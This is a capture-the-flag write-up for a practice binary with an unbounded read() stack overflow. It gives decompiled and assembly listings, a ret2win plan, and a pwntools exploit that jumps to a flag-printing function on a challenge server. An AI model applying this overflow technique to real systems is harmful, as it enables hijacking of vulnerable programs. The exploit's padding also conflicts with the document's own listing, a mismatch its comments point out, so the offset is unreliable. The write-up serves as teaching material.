
jarvisoj_tell_me_something

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/jarvisoj_tell_me_something/guestbook'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [rsp+0h] [rbp-88h] BYREF -- the input buffer lives at the bottom of a 0x88-byte frame; checksec above shows no stack canary

write(1, "Input your message:\n", 0x14uLL);
read(0, &v4, 0x100uLL); // stack overflow: read() accepts up to 0x100 bytes but the frame is only 0x88 bytes, so the saved return address (at rbp+0) is overwritten by attacker-controlled input; the fix is to bound the read by the buffer's size
return write(1, "I have received your message, Thank you!\n", 0x29uLL);
}

可疑函数good_game()

int good_game()
{
FILE *v0; // rbx
int result; // eax
char buf[9]; // [rsp+Fh] [rbp-9h] BYREF -- only buf[0] is ever used

v0 = fopen("flag.txt", "r"); // return value is never checked: if flag.txt is absent, fgetc(NULL) below is undefined behavior
while ( 1 )
{
result = fgetc(v0);
buf[0] = result;
if ( (_BYTE)result == 0xFF ) // only the low byte of result is compared, so a 0xFF data byte ends the loop exactly like EOF (-1); `result == EOF` is the correct test
break;
write(1, buf, 1uLL); // copies the file to stdout one byte at a time
}
return result; // the stream is never fclose()d; note main() never calls this function -- it is only reachable by redirecting control flow
}

// good_game() is located at 0x400620

0x02


思路

1.利用read()处溢出至good_game()

; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near
; __unwind {
sub rsp, 88h // 0x88-byte frame; note there is no push rbp before this, so no saved rbp sits between the buffer and the return address
mov edx, 14h ; n
mov esi, offset aInputYourMessa ; "Input your message:\n"
mov edi, 1 ; fd
call _write
mov rsi, rsp ; buf -- the read buffer starts at the very bottom of the frame
mov edx, 100h ; nbytes -- 0x100 > 0x88, so read() can run past the frame into the return address
xor edi, edi ; fd
call _read
mov edx, 29h ; ')' ; n
mov esi, offset aIHaveReceivedY ; "I have received your message, Thank you"...
mov edi, 1 ; fd
call _write
add rsp, 88h // rbp was never pushed: after this add, rsp points at the return address, which is 0x88 bytes above the start of the buffer
retn
; } // starts at 4004E0
main endp
stack buffer: 0x88 bytes
ret → good_game()

0x03


exp

from pwn import *

# Target context; debug logging prints every byte exchanged with the service.
context(os='linux', arch='amd64', log_level='debug')
# io = process(['./guestbook'])
io = remote('node4.buuoj.cn', 25838)

# Distance from the start of the read() buffer to the saved return address.
# NOTE(review): the assembly listing above shows `sub rsp, 88h` ... `add rsp, 88h` / `retn`
# with no `push rbp`, which places the return address 0x88 bytes from the buffer;
# the extra 0x8 here does not match that listing -- confirm the offset against the binary.
padding = 0x88 + 0x8
good_game = 0X400620  # address of good_game(); usable as a constant because checksec shows No PIE
payload = flat(b'a' * padding, good_game)  # flat() packs the int as 8 little-endian bytes per context.arch
io.recvuntil(b'Input your message:\n')
io.sendline(payload)
pause()
io.interactive()
